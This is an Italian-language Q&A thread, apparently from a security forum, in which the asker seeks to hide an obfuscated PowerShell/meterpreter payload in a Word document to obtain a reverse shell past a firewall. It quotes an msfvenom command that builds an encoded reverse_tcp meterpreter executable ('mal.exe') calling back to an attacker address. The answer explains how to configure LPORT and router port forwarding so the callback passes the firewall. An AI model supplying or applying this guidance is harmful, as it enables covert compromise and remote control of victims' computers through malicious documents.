LPORT question - Mi sembra di non capire alcuni concetti

2

Sto cercando di creare un payload per l'inserimento come codice offuscato in un documento Word, che creerà un listener sulla macchina attaccata e mi consentirà di eseguire alcuni comandi (non attraverso il file .exe come mostrato nei toni dei video )

Sto assumendo: La macchina attaccata è dietro un firewall, che blocca il traffico in uscita eccetto per la porta 80 e 443. Quindi voglio che il traffico della macchina attaccata venga inoltrato a quelle porte, così posso ascoltare ed eseguire.

Sto usando SET toolkit (in Kali), scegli "social-engineering attack" - > powershell attack vettori - > iniettore di codice shell alfanumerico.

Richiede LHOST, che è il mio IP pubblico, inoltrato al mio IP interno (sono dietro al router).

Quindi richiede LPORT e il gioco è fatto.

La mia comprensione è LPORT - Local Port, che significa porta che accetterò il traffico proveniente dalla macchina attaccata. Ma in questo caso, come posso specificare una porta in uscita per la macchina ATTACKED?

Vorrei una soluzione meterpreter, se possibile. Non mi interessa se è un vettore PowerShell o altro, dal momento che il carico utile, se ho capito correttamente, mi apre solo la possibilità di ascoltare ed eseguire comandi sulla macchina attaccata.

Su un cheatsheet di SANS Institute ho trovato un comando interessante:

msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Qui sembra che LPORT sia stato introdotto nel file malware, ma in questo caso sarà esattamente ciò di cui ho bisogno; una porta per il traffico in uscita dalla macchina attaccata.

    
posta Michael 16.08.2017 - 12:58
fonte

1 risposta

1

Dovrai impostare LPORT su due valori diversi . LPORT sul payload dovrebbe essere la porta che hai inoltrato sul router (quella a cui puoi accedere esternamente). LPORT sull'exploit dovrebbe essere una porta che la tua macchina attaccante ascolta, ad esempio la porta 4444.

Spiegazione:

Dal momento che un firewall consente solo la porta 80 e 443, dovrai inoltrare 80 o 443 sul router alla porta 4444.

Per questa spiegazione, porteremo la porta 5555 come porta aperta sul router e la porta 4444 come la porta che ascolta sul computer che attacca. Per gestire il firewall, dovrai utilizzare la porta 80 o 443 invece della porta 5555.

Dato che stai facendo questo attacco su Internet e hai il port forwarding sulla tua macchina attaccante, sei in grado di inviare dati da un computer su una rete diversa alla tua macchina attaccante. Sembra qualcosa del genere:

Computer on another network -> Router (port 5555) -> attacking machine (port 4444) 

Quindi, dal momento che il carico utile viene lanciato da un'altra rete, l'unico modo per comunicare con il tuo computer attaccante è sulla porta 5555.

L'exploit / handler è in esecuzione sulla tua macchina attaccante che si trova sulla tua rete. La porta 4444 sta ascoltando i dati che sono stati instradati da un computer esterno, tramite il router, e alla porta 4444. Per questo motivo, il LPORT per l'exploit / handler è 4444.

    
risposta data 16.08.2017 - 16:59
fonte

Leggi altre domande sui tag